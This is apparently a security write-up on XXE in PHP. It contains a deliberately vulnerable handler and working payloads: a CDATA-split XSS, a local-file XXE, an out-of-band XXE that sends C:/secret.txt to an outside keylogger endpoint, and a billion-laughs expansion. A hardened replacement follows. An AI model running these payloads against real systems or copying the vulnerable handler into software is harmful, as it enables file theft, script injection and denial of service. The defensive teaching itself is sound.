Proof Of Concept
<?php
// Vulnerable handler: user-supplied XML is parsed with entity substitution
// and external entity resolution switched on, then echoed back unencoded.
if (isset($_GET["submit"])) {
    $xml = $_GET["xml"];
    // Re-enables external entity loading (deprecated in PHP 8.0, where it is off by default)
    libxml_disable_entity_loader(false);
    $dom = new DOMDocument();
    $dom->resolveExternals = true;    // fetch external entities (file://, http://, ...)
    $dom->substituteEntities = true;  // expand entity references in the document
    $dom->preserveWhiteSpace = true;
    $dom->loadXML($xml, LIBXML_NOENT); // LIBXML_NOENT forces entity expansion
    echo $dom->textContent;           // unencoded output: reflected XSS sink
}
Manual Exploitation
<test><![CDATA[<]]>script<![CDATA[>]]>alert('XSS')<![CDATA[<]]>/script<![CDATA[>]]></test>
<!DOCTYPE change-log [
<!ENTITY systemEntity SYSTEM "file.txt">
]>
<change-log>
<text>&systemEntity;</text>
</change-log>
Out-of-band XML External Entity (OOB-XXE)
<!DOCTYPE change-log [
<!ENTITY % file SYSTEM "file:///C:/secret.txt" >
<!ENTITY % data SYSTEM "http://192.168.231.1/vulnerable/xml/oob/evil.dtd">
%data;
]>
<change-log>
<text>&send;</text>
</change-log>
Content of evil.dtd:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://192.168.231.1/keylogger/keylogger.php?c=%file;'>"> %all;
Content of file:///C:/secret.txt is captured by the listener.
Billion laughs attack
<!DOCTYPE lolz [
<!ENTITY lol "lol ">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>
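The following is an added hardened replacement for the handler in the Proof Of Concept section; it is not code from the original post. It rejects any input carrying a DOCTYPE or ENTITY declaration before parsing (which defeats the classic XXE, the OOB-XXE parameter-entity payload and the billion-laughs expansion above, since all three depend on a DTD), parses with LIBXML_NONET and without LIBXML_NOENT, and HTML-encodes the output so the CDATA-split script payload is rendered as text. It assumes PHP 8.0 or later with ext/dom; the function names and the "submit"/"xml" parameter names are kept from the post.

```php
<?php
// Added example, not part of the original post. Assumes PHP >= 8.0 with ext/dom.

/**
 * Reject any document that carries a DOCTYPE or ENTITY declaration before it
 * reaches the parser. Classic XXE, OOB-XXE via parameter entities and
 * entity-expansion (billion laughs) payloads all require a DTD, so refusing
 * DTDs outright removes the attack surface instead of relying on parser flags.
 */
function rejectDoctype(string $xml): void
{
    // Case-insensitive; catches "<!DOCTYPE" and "<!ENTITY" anywhere in the input,
    // including after leading whitespace or an XML declaration.
    if (preg_match('/<!\s*(DOCTYPE|ENTITY)/i', $xml)) {
        throw new InvalidArgumentException('DTD and entity declarations are not allowed');
    }
}

function parseUntrustedXml(string $xml): DOMDocument
{
    rejectDoctype($xml);

    $dom = new DOMDocument();
    // Never resolve external entities or substitute entity references.
    $dom->resolveExternals   = false;
    $dom->substituteEntities = false;

    // LIBXML_NONET: forbid network access during parsing.
    // LIBXML_NOENT is deliberately omitted; it is the flag that expands entities.
    // Parser warnings are captured and surfaced as an exception instead of
    // being printed into the response.
    $previous = libxml_use_internal_errors(true);
    try {
        if ($dom->loadXML($xml, LIBXML_NONET) === false) {
            $err = libxml_get_last_error();
            throw new RuntimeException(
                'XML parse error: ' . ($err ? trim($err->message) : 'unknown')
            );
        }
    } finally {
        libxml_clear_errors();
        libxml_use_internal_errors($previous);
    }
    return $dom;
}

if (isset($_GET['submit'], $_GET['xml'])) {
    header('Content-Type: text/html; charset=UTF-8');
    try {
        $dom = parseUntrustedXml((string) $_GET['xml']);
        // Encode before echoing: the CDATA-split <script> payload from the
        // Manual Exploitation section is rendered as literal text, not executed.
        echo htmlspecialchars($dom->textContent, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    } catch (Throwable $e) {
        http_response_code(400);
        echo 'Rejected: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
```

The pre-parse check is intentionally a blunt string match rather than a parser option: it is cheap, it fails closed, and it does not depend on which libxml2 version or PHP default happens to govern external entity loading on the host. If an application legitimately needs a DTD, keep the parser flags above and restrict the DOCTYPE to an allow-listed internal subset instead of dropping the check.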